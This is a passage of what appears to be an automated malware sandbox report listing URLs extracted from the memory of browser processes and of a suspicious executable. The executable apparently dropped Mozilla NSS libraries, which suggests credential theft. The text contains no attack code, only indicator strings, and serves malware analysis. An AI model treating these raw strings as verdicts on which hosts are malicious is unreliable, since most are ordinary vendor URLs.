Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr, HubApps Icons.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr, HubApps Icons.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr, HubApps Icons.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr, HubApps Icons.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://gaana.com/
Source: chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000008.00000003.1314419021.000056500039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1314219078.0000565000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1349874385.000056500080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/9v
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ex
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Fw
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/G
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Hx
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/J
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Mw
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ox
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Pw
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Q
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Rx
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Yx
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Zw
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/aw
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/du
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/dw
Source: chrome.exe, 00000008.00000003.1314632078.0000565000684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gjPV
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/kw
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/nw
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/uw
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/xw
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1314632078.0000565000684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000008.00000003.1314419021.000056500039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1314219078.0000565000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1349874385.000056500080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000008.00000003.1314632078.0000565000684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/VPi
Source: chrome.exe, 00000008.00000003.1314632078.0000565000684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000008.00000003.1314632078.0000565000684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000008.00000003.1314868445.00005650006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1351945577.00000F9C03760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1352174607.00000F9C03780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1352131143.00000F9C0377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 00000008.00000003.1314419021.000056500039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1314219078.0000565000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1349874385.000056500080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: msedge.exe, 0000000D.00000002.1510846002.0000152802514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, IIJEBFCFIJJJEBGDBAKE.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000008.00000003.1348922109.00000F9C03B34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000008.00000003.1348922109.00000F9C03B34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000008.00000003.1314419021.000056500039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1314219078.0000565000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1349874385.000056500080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000008.00000003.1314419021.000056500039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1314219078.0000565000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1349874385.000056500080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000008.00000003.1349874385.000056500080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000008.00000003.1362826974.00000F9C03EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1354718747.00000F9C03D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355376953.00000F9C03DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1354274186.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: chrome.exe, 00000008.00000003.1329800088.00000F9C025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1333048708.00000F9C03360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1330145538.00000F9C03308000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000008.00000003.1329800088.00000F9C025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1333048708.00000F9C03360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1330145538.00000F9C03308000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000008.00000003.1314868445.00005650006E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000008.00000003.1349874385.000056500080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1348777383.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://m.kugou.com/
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://m.soundcloud.com/
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://m.vk.com/
Source: chrome.exe, 00000008.00000003.1362826974.00000F9C03EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1354718747.00000F9C03D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355376953.00000F9C03DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1354274186.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: msedge.exe, 0000000D.00000002.1510846002.0000152802514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 0000000D.00000002.1510846002.0000152802514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: msedge.exe, 0000000D.00000002.1510846002.0000152802514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/Y
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://music.amazon.com
